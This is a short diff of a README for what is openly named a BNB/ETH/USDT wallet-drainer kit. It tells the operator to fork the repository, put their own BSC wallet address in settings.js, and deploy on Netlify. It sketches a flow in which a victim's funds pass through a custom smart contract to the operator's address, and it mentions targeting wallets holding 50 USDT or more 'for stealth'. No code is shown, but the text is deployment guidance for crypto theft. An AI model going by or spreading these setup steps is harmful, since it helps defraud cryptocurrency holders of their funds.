xxxKEKxxx/bnb-eth-usdt-wallet-drainer/README.md

 4. Add your wallet to settings.js file use bsc address make sure its on your forked one

+Fork ---------->  add your bsc wallet to settings.js file  ------> Go to  https://www.netlify.com/ and deploy

 !!!!!!
 Make sure you add your wallet to settings.js file !!!!!!!

 HOW IT WORKS

-VICTIM ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS
+Wallet gets drained ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS

 !!!!!!!!!
 This only will work with wallets that have 50 usdt or more for stealth !!!!!!!!!